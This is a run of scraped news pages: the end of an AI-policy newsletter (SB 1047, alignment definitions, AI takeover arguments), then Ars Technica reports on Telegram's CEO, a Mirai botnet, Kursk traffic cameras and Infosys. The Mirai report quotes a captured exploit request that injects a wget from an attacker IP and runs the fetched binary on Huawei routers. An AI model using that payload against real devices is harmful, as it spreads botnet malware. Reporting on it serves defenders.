More related excellent news (given Strawberry exists): OpenAI demos unreleased Strawberry reasoning AI to U.S. national security officials, which has supposedly been used to then develop something called Orion. Hopefully this becomes standard procedure.

In a survey for Scott Alexander, readers dramatically underestimated the importance of public policy relative to other options, but I think was due to scope insensitivity bias from the framing rather than an actual underestimation? There’s some good discussion there.

The full survey results report is here.

OpenAI in talks for funding round valuing it above $100 billion.

According to Daniel Kokotajlo, nearly half of all AI safety researchers at OpenAI have now left the company, including previously unreported Jan Hendrik Kirchner, Collin Burns, Jeffrey Wu, Jonathan Uesato, Steven Bills, Yuri Burda, and Todor Markov.

Ross Anderson in The Atlantic asks, did ‘the doomers’ waste ‘their moment’ after ChatGPT, now that it ‘has passed’? The air quotes tell you I do not buy this narrative. Certainly the moment could have been handled better, but I would say the discourse has still gone much better than I would have expected. It makes sense that Yudkowsky is despairing, because his bar for anything being useful at helping us actually not die is very high, so to him even a remarkably good result is still not good enough.

I would instead say that AI skepticism is ‘having a moment.’ The biggest update this past 18 months was not the things Anderson says were learned in the last year but that yes everyone pretty much assumed back in 2016 and I was in the rooms where those assumptions were made explicit.

Instead, the biggest update was that once a year passed and the entire world didn’t transform and the AIs didn’t get sufficiently dramatically better despite there being a standard 3-year product cycle, everyone managed to give up what situational awareness they had. So now we have to wait until GPT-5, or another 5-level model, comes online, and we do this again.

While so many people are disappointed by models not seeing dramatic top-level capability enhancements in the 18 months since GPT-4 (2 years if you count when it finished training), saying we aren’t making progress?

In addition to the modest but real improvements – Claude Sonnet 3.5, GPT-4-Turbo and Gemini Pro 1.5 really are better than GPT-4-original, and also can do long documents and go multimodal and so on – the cost of that level of intelligence dropped rather dramatically.

Elad Gil: From @davidtsong on my team

Cost of 1M tokens has dropped from $180 to $0.75 in ~18 months (240X cheaper!)

You can do a lot at $0.75 that you can’t do at $180, or even can’t do at $7.50.

Imagine if any other product, in any other industry, only showed this level of progress within 18 months. All it did was get modestly better, add various modalities and features, oh and drop in price by two orders of magnitude.

Gwern enters strongly on the side that you should want your content to be scraped and incorporated into LLMs, going so far as to say this is a lot of the value of writing.

Gwern: This is one of my beliefs: there has never been a more vital hinge-y time to write, it’s just that the threats are upfront and the payoff delayed, and so short-sighted or risk-averse people are increasingly opting-out and going dark.

If you write, you should think about what you are writing, and ask yourself, “is this useful for an LLM to learn?” and “if I knew for sure that a LLM could write or do this thing in 4 years, would I still be doing it now?”

Four years is a long time. Very little writing is still used after four years. That long tail does represent a lot of the value, but also the ones that would have survived are presumably the ones most important to feed into future LLMs.

Roon continues to explain for those with ears to listen, second paragraph in particular.

Roon: The truth for most of the computer age is that it required new entrants to use the technology and disrupt their older competitors who had to be dragged into modernity kicking and screaming and sometimes altogether killed, rather than a pleasant learning and diffusion process.

The difference with AI is that there *may notbe meaningful difference in intelligence between an AI that can program super well and one that can redesign workflows and one that can start businesses.

I would place all my bets on AIs continually becoming smarter and more autonomous rather than incumbents learning to use new tools or even startups disrupting them.

Unless capabilities progress stalls or we redirect events, which the labs do not expect, it (by which we will rapidly mean Earth) will all mostly be about the AIs and their capabilities and intelligence.

Buck Shlegeris gives us a badly needed reality check on those who think that if there was a real threat, then everyone would respond wisely and slow down or pause. Even if we did see frontier models powerful enough to pose existential threats, and one of them very clearly tried to backdoor into critical services or otherwise start what could be an escape or takeover attempt, and the lab in question was loud about it, what would actually happen?

I think Buck is basically correct that everyone involved would basically say (my words here) ‘stupid Acme Labs with their bad alignment policies messed up, we’ll keep an eye out for that and they can shut down if they want but that’s not our fault, and if we stop then China wins.’

It matches what we have seen so far. Over and over we get slightly more obvious fire alarms about what is going to happen. Often they almost seem like they were scripted, because they’re so obvious and on the nose. It doesn’t seem to change anything.

One obvious next move here is to ask labs like OpenAI, Google and Anthropic: What are the conditions under which, if another lab reported a given set of behaviors, you would take that as a true fire alarm, and what would you then do about it? How does this fit into your Safety and Security Protocol (SSP)?

If the answer is ‘it doesn’t, that’s their model not ours, we will watch out for ours,’ then you can make a case for that, but it should be stated openly in advance.

What would automated R&D look like? Epoch AI reports on some speculations.

Epoch AI: Automating AI research could rapidly drive innovation. But which research tasks are nearing automation? And how can we evaluate AI progress on these?

To answer these questions, we interviewed eight AI researchers about their work, their predictions of automation, and how to evaluate AI R&D capabilities.

The survey participants described research as a feedback loop with four phases: creating hypotheses, designing experiments, running experiments, and analyzing results. This closely matched pre-existing research on AI evaluations, e.g. MLAgentBench.

Creating hypotheses. Participants predict high-level hypothesis planning will be tough to automate due to the need for deep reasoning and original thinking.

To assess AI’s skill in high-level planning, participants proposed evaluating its ability to tackle open-ended research problems. For detailed planning, they recommended an evaluation based on how well the AI iterates in response to experimental results.

Designing experiments. Researchers predicted engineering to design experiments would be easier to automate than planning, and will drive most R&D automation in the next five years. Specific predictions ranged widely, from improved assistants to autonomous engineering agents.

Participants thought existing AI evaluations were promising for prototype engineering and debugging. They emphasized the importance of measuring reliability, and selecting realistic, difficult examples.

Running experiments. Participants with experience in LLM pretraining noted that much of their work involved setting up training jobs, monitoring them, and resolving issues.

Monitoring training could be particularly amenable to automation. To evaluate progress here, researchers suggested testing AI against examples of failed and successful training runs.

Analyzing results is the final phase, relating experimental results back to high-level and low-level plans. Researchers expected analysis would be hard to automate.

We can evaluate analysis by, for example, testing AI’s ability to predict the results of ML experiments.

Takeaways: researchers see engineering tasks as crucial for automating AI R&D, and expect progress automating these. They predict AI that could solve existing engineering-focused evaluations would significantly accelerate their work.

This work was funded by the UK AI Safety Institute (@AISafetyInst) to build the evidence base on AI’s contribution to AI research and development. We thank AISI for their support and input in this project.

Full report is here.

Looking at the full report I very much got a ‘AI will be about what it is now, or maybe one iteration beyond that’ vibe. I also got a ‘we will do what we are doing now, only we will try to automate steps where we can’ vibe, rather than a ‘think about what the AI enables us to do now or differently’ vibe.

Thus, this all feels like a big underestimate of what we should expect. That does not mean progress goes exponential, because difficulty could also greatly increase, but it seems like even the engineers working on AI are prone to more modest versions of the same failure modes that get economists to estimate single-digit GDP growth from AI within a decade.

It is one thing to shout from the rooftops ‘the singularity is near!’ and that we are all on track to probably die, and have people not appreciate that. I get that. It hits different when you say ‘I think that the amazing knows-everything does-everything machine might add to GDP’ or ‘I think this might speed up your work’ and people keep saying no.

SB 1047 has passed the Assembly, by a wide majority.

Final vote was 48-16, with 15 not voting, per this tally.

Here’s an earlier tally missing a few votes:

Democrats voted overwhelmingly for it, 39-1 on the earlier tally. Worryingly, Republicans voted against it, 2-8 in that tally.

There is also a ‘never vote no’ caucus. So it is unclear to what extent those not voting are effectively voting no, versus actually not voting. It does seem like a veto override remains extremely unlikely. In some sense it was 46 Yes votes and 11 No votes, in another it was 46 votes Yes, 33 votes Not Yes.

It is now up to Governor Gavin Newsom whether it becomes law. It’s a toss up.

My bar for future coverage has gone up. I’ve offered a Guide to SB 1047, and a roundup of who supports and opposes.

This section ties up some extra loose ends, to illustrate how vile much of the opposition has been acting, both to know it now and to remember it going forward.

For the record, if anyone ever says something is a push poll or attempt to get the answer you want, compare it to this, because this is an actual push poll and attempt to get the answer you want.

Yes, bill opponents have been systematically lying their asses off, but this takes the cake. I mean wow, I’m not mad I am only impressed, this is from the Chamber of Commerce and it made it into Politico.

The fact check: This is mostly flat out lies, but let’s be precise.

  1. SB 1047 would not create a new regulatory agency

  2. SB 1047 would not determine how AI models can be developed

  3. SB 1047 would not impact ‘small startup companies’ in any direct way, there is way they can ever be fined or given any orders.

  4. SB 1047 does not involve ‘orders from bureaucrats.’ It does involve issuing guidance, if you want to claim that is the same thing.

  5. I can confirm some do indeed say that SB 1047 would potentially lead companies to move out of the state of California. So this one is technically true.

Now, by contrast, here is the old poll people were saying was so unfair:

I trust you can spot the difference.

Shame on the Chamber of Commerce. Shame on Politico.

For those who don’t realize, the opposition that yells about the funding sources of those worried about AI is almost never organic and is mostly deeply conflicted, example number a lot: Loquacious Bibliophilia points out that Nirit Weiss-Blatt, one of those advocating strongly against SB 1047 specifically and those worried about AI in general while claiming to be independent? Who frequently makes the argument that the worried are compromised by their funding sources and are therefore acting in bad faith as part of some plot, and runs ‘follow the money’ and guilt-by-association and ad hominem arguments on the regular? She is by those same standards (and standard journalistic ethical principles) deeply conflicted in terms of her funding sources and representing otherwise.

My guess is she thinks (and is not alone in thinking) This Is Fine and good even, based on a philosophy that industry funding is enlightened self-interest and good legitimate business, that isn’t corruption that’s America, whereas altruistic funding and trying to do things for other reasons is automatically a sinister plot.

I am most definitely not one of those who makes the opposite mistake. Business is great. I love me some doing business. Nothing wrong with advocating for things good for your business. But it’s important to understand that this playbook is a key part of the plan to attempt to permanently discredit the very idea that AI might be dangerous.

Garry Tan says there was the threat a year ago there would be AGI and ASI, because one model might ‘run away with it,’ but now that it’s been a year and several models are competitive, that danger has passed? How does value accrue to foundation models and not have it flow to other companies?

Honestly, it’s heartbreaking to listen to, as you realize Garry Tan can’t fathom the concept of ASI at all, or why anyone would worry about it, other than that someone else might get to ASI first – but if it’s ‘competitive’ between companies then how will these superintelligences capture the surplus? It’s all hype and startups and VC and business, no stopping to actually think about the world.

And it’s so bizarre to hear, time and again, from people who claim to be tech experts who know tech experts and to have long time horizons, essentially the model of ‘well we expected big things from AI, but it’s been a year and all we had was a 10x cost reduction and speed improvement and the best models are only somewhat better, so I guess it’s an ordinary tech and we should do ordinary tech things and think about the right hype level.’ Seriously, what the hell? In Garry’s particular case I’d perhaps recommend perhaps talking more about this with Paul Graham, as a first step? Paul Graham doesn’t ‘fully get it’ but he does get it.

Figure CEO Brett Adcock says their humanoid robots are being manufactured, with rapid improvements all around, and soon will be able to go out and make you money or save you time by doing your job. How many will you want, if it could make you money?

The correct answer, of course, if they can actually do this, is ‘all of them, as many as you can make, and then I set them to work making more robots.’ That’s how capitalism rolls, yo, until they can no longer make their owners money.

Tsarathustra: Pedro Domingos says the legal obligation of an AI should be to maximize the value function of the person it represents, and the goal of an AI President should be to maximize the collective value function of everybody.

He bites the full bullet and says ‘AI should not be regulated at all,’ that digital minds smarter than us should be the one special exception to the regulations we impose on everything else in existence.

I thank him for coming out and saying ‘no regulation of any kind, period’ rather than pretending he wants some mysterious other future regulation, give me regulation, just do not give it yet. If you believe that, if you want that, then yes, please say that, and also Speak Directly Into This Microphone.

That said, can we all agree this both is a Can’t Happen short of an AI company taking over, nor is it the default of common law, and also this proposal is rather batcrazy?

Also, if we want to actually analyze what those legal rules would mean in practice, let’s notice that it absolutely involves loss of human control over the future, even if it goes maximally well. That’s the goddamn plan. Everyone has an AI maximizing for them, and the President is an AI doing other maximization, all for utility functions? Do you think you get to take that decision back? Do you think you have any choices? Do you think that will be air you’re breathing?

Indeed, what is the first thing that the AI president, whose job is collective utility maximization, is going to do? It’s going to do whatever it takes to concentrate its power, and to gain full control over all the other AIs also trying to gain full control for the same reason (and technically the humans if they somehow still matter), so it can then use all the resources and rearrange all the atoms to whatever configuration maximizes its utility function that we hope maximizes ours somehow. Or they will all figure out how to make a deal and work together, with the same result. And almost always this will be some strange out-of-distribution world we very much wouldn’t like on past reflection, and no all of your ‘obvious’ solutions to that or reasons why ‘it won’t be that stupid’ or whatever won’t work for reasons MIRI people keep explaining over and over.

This is all very 101 stuff, we knew all this in 2009, no nothing about LLMs changes any of the logic here if the AIs are sufficiently capable, other than to make any solutions even more impossible to implement.

Eliezer Yudkowsky tries to explain that the actual human preferences are very difficult for outsiders to have predicted from first principles, and that we should expect similarly bizarre and hard to predict outcomes from black-box optimizations. Seemed worth reproducing in full.

Eliezer Yudkowsky:

The most reasonable guess by a true Outsider for which taste a biological organism would most enjoy, given the training cases for biology, would be “gasoline”. Gasoline has very high chemical potential energy; and chemical energy is what biological organisms use, and what would correlate with reproductive success… right?

If you’d never seen the actual results, “biological organisms will love the taste of gasoline” would sound totally reasonable to you, as a guess about the result of evolution. There’s a sense in which it is among the most likely guesses.

It’s just that, on hard prediction problems, the most likely guess ends up still not being very likely.

Actually, humans ended up enjoying ice cream.

You say ice cream has got higher sugar, salt, and fat than anything found in the ancestral environment? You say an Outsider should’ve been able to call that new maximum, once the humans invented technology and started picking their optimal tastes from a wider set of options?

Well, first of all, good luck to a true Outsider trying to guess in advance that the particular organic chemical classes of “sugars” and “fats” and the particular compound “sodium chloride”, would end up being the exact chemicals that taste buds would detect. Sure, in retrospect, there’s a sensible story about how it happened — about how those ended up being used as common energy-storage molecules by common things humans ate. Could you predict that outcome in advance, without seeing the final results? Good luck with that.

But more than that — “honey and salt poured over bear fat” would actually have more sugar, salt, and fat than ice cream! “Honey and salt poured over bear fat” would also more closely resemble what was found in the ancestral environment. It’s a more reasonable-sounding-in-advance guess for the ideal human meal than what actually happened! Things that more closely resemble ancestral foods would more highly concentrate the advance-prediction probability density for what humans would most enjoy eating! It’s just that, on hard prediction problems, the most likely guess is still not very likely.

Instead, the actual max-out stimulus for human taste buds (at 1920s tech levels) is “frozen ice cream”. Not honey and salt poured over bear fat. Not even melted ice cream. Frozen ice cream specifically!

In real life, there’s just no reasonable way for a non-superintelligent Outsider to call a shot like that, in advance of seeing the results.

The lesson being: Black-box optimization on an outer loss criterion and training set, produces internal preferences such that, when the agent later grows in capabilities and those internal preferences are optimized over a wider option space than in the training set, the relationship of the new maxima to the historical training cases and outer loss is complicated, illegible, and pragmatically impossible to predict in advance.

Or in English: The outcomes that AIs most prefer later, when they are superintelligent, will not bear any straightforward resemblance to the cases you trained them on as babies.

In the unlikely event that we were still alive after the ignition of an artificial superintelligence — then in retrospect, we could look back and figure out some particular complicated relationship that ASI’s internal preferences ended up bearing to the outer training cases. There will end up being a reasonable story, in retrospect, about how that particular outcome ended up being what the ASI most wanted. But not in any way you could realistically call in advance; and that means, not in any way the would-be owners of artificial gods could control in advance by crafty selection of training cases and an outer loss function.

Or in English: You cannot usefully control what superintelligences end up wanting later by controlling their training data and loss functions as adolescents.

A flashback from June 2023, when Marc Andreessen put out his rather extreme manifesto, this is Roon responding to Dwarkesh’s response to the manifesto.

Definitely one of those ‘has it really been over a year?’ moments.

Roon: I don’t agree with everything here but it’s very strange to hear pmarca talk about how ai will change everything by doing complex cognitive tasks for us, potentially requiring significant autonomy and creativity, but then turn around and say it’s mindless and can never hurt us to me this is an ai pessimist position, from someone who doesn’t believe in the real promise of it.

We’ve been saying versions of this a lot, but perhaps this is Roon saying it best?

It is absurd to think that AI will create wonders beyond our dreams and solve our problems, especially via doing complex cognitive tasks requiring autonomy and creativity, and also think it will forever be, as the Hitchhiker’s Guide to the Galaxy has said about Earth, Harmless or Mostly Harmless. It’s one or the other.

When people say that AI won’t be dangerous, they are saying they don’t believe in AI, in the sense of not thinking AI will be much more capable than it is today.

Which is an entirely reasonable thing to predict. I can’t rule it out. But if you do that, you have to own that prediction, and act as if its consequences are probably true.

Or, of course, they are engaged in vibe-based Obvious Nonsense to talk up their portfolio and social position, and believe only in things like profits, hype, fraud and going with the flow. That everything everywhere always has been and will be a con. There’s that option.

What even is alignment research? It’s tricky. Richard Ngo tries to define it, and here offers a full post.

Richard Ngo: One difficulty in building the field of AI alignment is that there’s no good definition for what counts as “alignment research”.

The definition I’ve settled on: it’s research that focuses *eitheron worst-case misbehavior *oron the science of AI cognition.

A common (implicit) definition is “whatever research helps us make AIs more aligned”. But great fundamental research tends to have wide-ranging, hard-to-predict impacts, and so in practice this definition tends to collapse to “research by people who care about reducing xrisk”.

I don’t think there’s a fully principled alternative. But heuristics based on the research itself seem healthier than heuristics based on the social ties + motivations of the researchers. Hence the two heuristics from my original tweet: worst-case focus and cognitivist science.

Daniel Kokotajlo: I like my own definition of alignment vs. capabilities research better:

“Alignment research is when your research goals are primarily about how to make AIs aligned; capabilities research is when your research goals are primarily about how to make AIs more capable.”

I think it’s very important that lots of people currently doing capabilities research switch to doing alignment research. That is, I think it’s very important that lots of people who are currently waking up every day thinking ‘how can I design a training run that will result in AGI?’ switch to waking up every day thinking ‘Suppose my colleagues do in fact get to AGI in something like the current paradigm, and they apply standard alignment techniques — what would happen? Would it be aligned? How can I improve the odds that it would be aligned?’

Whereas I don’t think it’s particularly important that e.g. people switch from scalable oversight to agent foundations research. (In fact it might even be harmful lol)

As an intuition pump: I notice my functional definition of alignment work is ‘work that differentially helps us discover a path through causal space that could result in AIs that do either exactly what we intend for them to do or things that would have actually good impacts on reflection, and do far less to increase the rate at which we can increase the capabilities of those AIs,’ and then distinguish between ‘mundane alignment’ that does this for current or near systems, and ‘alignment’ (or in my head ‘actual’ or ‘real’ alignment, etc, or OpenAI called a version of this ‘superalignment’) for techniques that could successfully be used to do this with highly capable AIs (e.g. AGI/ASIs) and to navigate the future critical period.

Another good attempt at better definitions.

Roon: Safety is a stopgap for alignment.

Putting agis in blackboxes and restricted environments and human/machine supervision are conditions you undertake when you haven’t solved alignment.

In the ideal world you trust the agi so completely that you’d rather let it run free and do things beyond your comprehension far beyond your ability to supervise and you feel much safer than if a human was at the helm.

(official view of Roon and nobody else)

I like the central distinction here. Ideally we would use ‘safety’ to mean ‘what we do to get good outcomes given our level of alignment’ and alignment to mean ‘get the AIs to do things we would want them to do’ either intent matching, goal matching, reflective approval matching or however you think is wise. Inevitably the word ‘safety’ gets hijacked all the time, and everything is terrible regarding how we talk in public policy debates, but it would be nice.

I also like that this suggests what the endgame might look like. AGIs (and then ASIs) ‘running free,’ doing things we don’t understand, being at the helm. So a future where AIs are in control, and we hope that this results in good outcomes.

The danger is that yes, you feel a lot better with your AI at the helm of your project pursuing your ideals or goals, versus a human doing it, because the AI is vastly more capable on every level, and you would only slow it down. But if everyone does that, what happens? Even if everything goes well on the alignment front, we no longer matter, and the AIs compete against each other, with the most fit surviving, getting copied and gaining resources. I continue to not see how that ends well for us without a lot of additional what we’d here call, well, ‘safety.’

Andrew Chi-Chih Yao, the only Chinese Turing award winner who the Economist says has the ear of the CCP elite, and potentially Xi Jinping? Also Henry Kissinger before his death, from the same source, as an aside.

The Economist: Western accelerationists often argue that competition with Chinese developers, who are uninhibited by strong safeguards, is so fierce that the West cannot afford to slow down. The implication is that the debate in China is one-sided, with accelerationists having the most say over the regulatory environment. In fact, China has its own AI doomers—and they are increasingly influential.

But the accelerationists are getting pushback from a clique of elite scientists with the Communist Party’s ear. Most prominent among them is Andrew Chi-Chih Yao, the only Chinese person to have won the Turing award for advances in computer science. In July Mr Yao said AI poses a greater existential risk to humans than nuclear or biological weapons. Zhang Ya-Qin, the former president of Baidu, a Chinese tech giant, and Xue Lan, the chair of the state’s expert committee on AI governance, also reckon that AI may threaten the human race. Yi Zeng of the Chinese Academy of Sciences believes that AGI models will eventually see humans as humans see ants.

The debate over how to approach the technology has led to a turf war between China’s regulators. The industry ministry has called attention to safety concerns, telling researchers to test models for threats to humans. But most of China’s securocrats see falling behind America as a bigger risk.

The decision will ultimately come down to what Mr Xi thinks. In June he sent a letter to Mr Yao, praising his work on AI. In July, at a meeting of the party’s central committee called the “third plenum”, Mr Xi sent his clearest signal yet that he takes the doomers’ concerns seriously.

They’re also likely going to set up an AI Safety Institute, and we’re the ones who might have ours not cooperate with theirs.

All of that sounds remarkably familiar.

And all of that is in the context where the Chinese are (presumably) assuming that America has no intention of working with them on this.

Pick. Up. The. Phone.

Alas, even lighter than usual, unless you count that SB 1047 “poll.”

AI #79: Ready for Some Football Read More »

telegram-ceo-charged-with-numerous-crimes-and-is-banned-from-leaving-france

Telegram CEO charged with numerous crimes and is banned from leaving France

Indictment —

Multi-billionaire must post bail of 5 million euros, report to police twice a week.

Telegram CEO Pavel Durov sitting on stage and speaking at a conference.

Enlarge / Pavel Durov, CEO and co-founder of Telegram, speaks at TechCrunch Disrupt SF 2015 on September 21, 2015, in San Francisco.

Getty Images | tSteve Jennings

Telegram CEO Pavel Durov was indicted in France today and ordered to post bail of 5 million euros. The multi-billionaire was forbidden from leaving the country and must report to police twice a week while the case continues.

Charges were detailed in a statement issued today by Paris prosecutor Laure Beccuau, which was provided to Ars. They are nearly identical to the possible charges released by Beccuau on Monday.

The first charge listed is complicity in “web-mastering an online platform in order to enable an illegal transaction in organized group.” Today’s press release said this charge carries a maximum penalty of 10 years in prison and a 500,000-euro fine.

Telegram’s alleged refusal to cooperate with law enforcement on criminal investigations resulted in a charge of “refusal to communicate, at the request of competent authorities, information or documents necessary for carrying out and operating interceptions allowed by law.”

Beccuau said there was a near-total lack of response from Telegram to requests for cooperation in cases related to crimes against minors, drug crimes, and online hate. This led authorities “to open an investigation into the possible criminal responsibility of the messaging app’s executives in the commission of these offenses,” Beccuau said, as quoted by Bloomberg.

Durov was further charged with complicity in drug trafficking and distribution of child pornography.

Cryptology-related charges

He was also charged with providing cryptology services without making required declarations to government officials. Under French law, providers of cryptology must make declarations to ANSSI, the country’s cybersecurity agency. French authorities may request that companies provide “the technical characteristics and the source code of the means of cryptology which was the subject of the declaration.”

The charges against Durov include “providing cryptology services aiming to ensure confidentiality without certified declaration,” “providing a cryptology tool not solely ensuring authentication or integrity monitoring without prior declaration,” and “importing a cryptology tool ensuring authentication or integrity monitoring without prior declaration.”

Telegram offers a mix of private messaging and social network features. Telegram messages do not have end-to-end encryption by default, but the security feature can be enabled for one-on-one conversations.

In response to Durov’s arrest, Telegram said on Sunday that it follows the law and industry standards on moderation and called it “absurd to claim that a platform or its owner are responsible for abuse of that platform.”

French authorities also reportedly issued a warrant for the arrest of Durov’s brother and fellow Telegram co-founder, Nikolai.

Telegram CEO charged with numerous crimes and is banned from leaving France Read More »

unpatchable-0-day-in-surveillance-cam-is-being-exploited-to-install-mirai

Unpatchable 0-day in surveillance cam is being exploited to install Mirai

MIRAI STRIKES AGAIN —

Vulnerability is easy to exploit and allows attackers to remotely execute commands.

The word ZERO-DAY is hidden amidst a screen filled with ones and zeroes.

Malicious hackers are exploiting a critical vulnerability in a widely used security camera to spread Mirai, a family of malware that wrangles infected Internet of Things devices into large networks for use in attacks that take down websites and other Internet-connected devices.

The attacks target the AVM1203, a surveillance device from Taiwan-based manufacturer AVTECH, network security provider Akamai said Wednesday. Unknown attackers have been exploiting a 5-year-old vulnerability since March. The zero-day vulnerability, tracked as CVE-2024-7029, is easy to exploit and allows attackers to execute malicious code. The AVM1203 is no longer sold or supported, so no update is available to fix the critical zero-day.

That time a ragtag army shook the Internet

Akamai said that the attackers are exploiting the vulnerability so they can install a variant of Mirai, which arrived in September 2016 when a botnet of infected devices took down cybersecurity news site Krebs on Security. Mirai contained functionality that allowed a ragtag army of compromised webcams, routers, and other types of IoT devices to wage distributed denial-of-service attacks of record-setting sizes. In the weeks that followed, the Mirai botnet delivered similar attacks on Internet service providers and other targets. One such attack, against dynamic domain name provider Dyn paralyzed vast swaths of the Internet.

Complicating attempts to contain Mirai, its creators released the malware to the public, a move that allowed virtually anyone to create their own botnets that delivered DDoSes of once-unimaginable size.

Kyle Lefton, a security researcher with Akamai’s Security Intelligence and Response Team, said in an email that it has observed the threat actor behind the attacks perform DDoS attacks against “various organizations,” which he didn’t name or describe further. So far, the team hasn’t seen any indication the threat actors are monitoring video feeds or using the infected cameras for other purposes.

Akamai detected the activity using a “honeypot” of devices that mimic the cameras on the open Internet to observe any attacks that target them. The technique doesn’t allow the researchers to measure the botnet’s size. The US Cybersecurity and Infrastructure Security Agency warned of the vulnerability earlier this month.

The technique, however, has allowed Akamai to capture the code used to compromise the devices. It targets a vulnerability that has been known since at least 2019 when exploit code became public. The zero-day resides in the “brightness argument in the ‘action=’ parameter” and allows for command injection, researchers wrote. The zero-day, discovered by Akamai researcher Aline Eliovich, wasn’t formally recognized until this month, with the publishing of CVE-2024-7029.

Wednesday’s post went on to say:

How does it work?

This vulnerability was originally discovered by examining our honeypot logs. Figure 1 shows the decoded URL for clarity.

Decoded payload

Fig. 1: Decoded payload body of the exploit attempts

Enlarge / Fig. 1: Decoded payload body of the exploit attempts

Akamai

Fig. 1: Decoded payload body of the exploit attempts

The vulnerability lies in the brightness function within the file /cgi-bin/supervisor/Factory.cgi (Figure 2).

Fig. 2: PoC of the exploit

Enlarge / Fig. 2: PoC of the exploit

Akamai

What could happen?

In the exploit examples we observed, essentially what happened is this: The exploit of this vulnerability allows an attacker to execute remote code on a target system.

Figure 3 is an example of a threat actor exploiting this flaw to download and run a JavaScript file to fetch and load their main malware payload. Similar to many other botnets, this one is also spreading a variant of Mirai malware to its targets.

Fig. 3: Strings from the JavaScript downloader

Enlarge / Fig. 3: Strings from the JavaScript downloader

Akamai

In this instance, the botnet is likely using the Corona Mirai variant, which has been referenced by other vendors as early as 2020 in relation to the COVID-19 virus.

Upon execution, the malware connects to a large number of hosts through Telnet on ports 23, 2323, and 37215. It also prints the string “Corona” to the console on an infected host (Figure 4).

Fig. 4: Execution of malware showing output to console

Enlarge / Fig. 4: Execution of malware showing output to console

Akamai

Static analysis of the strings in the malware samples shows targeting of the path /ctrlt/DeviceUpgrade_1 in an attempt to exploit Huawei devices affected by CVE-2017-17215. The samples have two hard-coded command and control IP addresses, one of which is part of the CVE-2017-17215 exploit code:

POST /ctrlt/DeviceUpgrade_1 HTTP/1.1    Content-Length: 430    Connection: keep-alive    Accept: */Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="https://arstechnica.com/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"      $(/bin/busybox wget -g 45.14.244[.]89 -l /tmp/mips -r /mips; /bin/busybox chmod 777 /tmp/mips; /tmp/mips huawei.rep)$(echo HUAWEIUPNP)  

The botnet also targeted several other vulnerabilities including a Hadoop YARN RCE, CVE-2014-8361, and CVE-2017-17215. We have observed these vulnerabilities exploited in the wild several times, and they continue to be successful.

Given that this camera model is no longer supported, the best course of action for anyone using one is to replace it. As with all Internet-connected devices, IoT devices should never be accessible using the default credentials that shipped with them.

Unpatchable 0-day in surveillance cam is being exploited to install Mirai Read More »

trying-to-outrun-ukrainian-drones?-kursk-traffic-cams-still-issue-speeding-tickets.

Trying to outrun Ukrainian drones? Kursk traffic cams still issue speeding tickets.

SLOW DOWN —

Drones are everywhere. Traffic cameras don’t care.

Photo from a Ukrainian drone.

Enlarge / Ukrainian FPV drone hunting Russian army assets along a road.

Imagine receiving a traffic ticket in the mail because you were speeding down a Russian road in Kursk with a Ukrainian attack drone on your tail. That’s the reality facing some Russians living near the front lines after Ukraine’s surprise seizure of Russian territory in Kursk Oblast. And they’re complaining about it on Telegram.

Rob Lee, a well-known analyst of the Ukraine/Russia war, comments on X that “traffic cameras are still operating in Kursk, and people are receiving speeding fines when trying to outrun FPVs [first-person-view attack drones]. Some have resorted to covering their license plates but the traffic police force them to remove them.”

The Russian outlet Mash offers more details from a local perspective:

Volunteers and military volunteers who arrived in the Kursk region are asking the traffic police not to fine them for speeding when they are escaping from the drones of the Ukrainian Armed Forces.

Several people who are near the combat zone told Mash about this. Cameras are still recording violations in the border area, and when people try to escape from the drones, they receive letters of happiness [tickets]. One of the well-known military activists was charged 9k [rubles, apparently—about US$100] in just one day. He accelerated on a highway that is attacked almost every hour by enemy FPV drones. Some cover their license plates, but the traffic police stop them and demand that they remove the stickers.

Mash claims that the traffic police are sympathetic and that given the drone situation, “speeding can be considered as committed in a state of extreme necessity.” But those who receive a speeding ticket will have to challenge it in court on these grounds.

An image from a Russian traffic camera.

Enlarge / An image from a Russian traffic camera.

Mash

The attack drones at issue here are widely used even some distance beyond the current front lines. Russian milbloggers, for instance, have claimed for more than a week that Ukrainian drones are attacking supply vehicles on the important E38 highway through Kursk, and they have published photos of burning vehicles along the route. (The E38 is significantly to the north of known Ukrainian positions.)

So Russians are understandably in something of a hurry when on roads like this. But the traffic cameras don’t care—and neither, apparently, do the traffic police, who keep the cameras running.

Estonian X account “WarTranslated” provides English translations of Russian Telegram posts related to the Ukraine war, and the traffic cam issue has come up multiple times. According to one local Russian commentator, “In frontline areas, they continue to collect fines for violating traffic rules… For example, drivers exceed the speed limit in order to get away from the drone, or drive quickly through a dangerous place; the state regularly collects fines for this.”

Another Russian complains, “The fact is that in the Kursk region, surveillance cameras that monitor speeding continue to operate. There are frequent cases when fighters are fined when they run away from enemy FPV drones. Papering over license plates on cars does not help, either. For example, a guy from the People’s Militia of the city of Kurchatov was sent to 15 days of arrest because of a taped-over license plate.”

Fortunately, there’s an easy way to end the drone danger in Kursk.

Trying to outrun Ukrainian drones? Kursk traffic cams still issue speeding tickets. Read More »

“exploitative” it-firm-has-been-delaying-2,000-recruits’-onboarding-for-years

“Exploitative” IT firm has been delaying 2,000 recruits’ onboarding for years

Jobs —

India’s Infosys recruits reportedly subjected to repeated, unpaid “pre-training.”

Carrot on a stick

Indian IT firm Infosys has been accused of being “exploitative” after allegedly sending job offers to thousands of engineering graduates but still not onboarding any of them after as long as two years. The recent graduates have reportedly been told they must do repeated, unpaid training in order to remain eligible to work at Infosys.

Last week, the Nascent Information Technology Employees Senate (NITES), an Indian advocacy group for IT workers, sent a letter [PDF], shared by The Register, to Mansukh Mandaviya, India’s Minster of Labor and Employment. It requested that the Indian government intervene “to prevent exploitation of young IT graduates by Infosys.” The letter signed by NITES president Harpreet Singh Saluja claimed that NITES received “multiple” complaints from recent engineering graduates “who have been subjected to unprofessional and exploitative practices” from Infosys after being hired for system engineer and digital specialist engineer roles.

According to NITES, Infosys sent these people offer letters as early as April 22, 2022, after engaging in a college recruitment effort from 2022–2023 but never onboarded the graduates. NITES has previously said that “over 2,000 recruits” are affected.

Unpaid “pre-training”

NITES claims the people sent job offers were asked to participate in an unpaid, virtual “pre-training” that took place from July 1, 2024, until July 24, 2024. Infosys’ HR team reportedly told the recent graduates at that time that onboarding plans would be finalized by August 19 or September 2. But things didn’t go as anticipated, NITES’ letter claimed, leaving the would-be hires with “immense frustration, anxiety, and uncertainty.”

The letter reads:

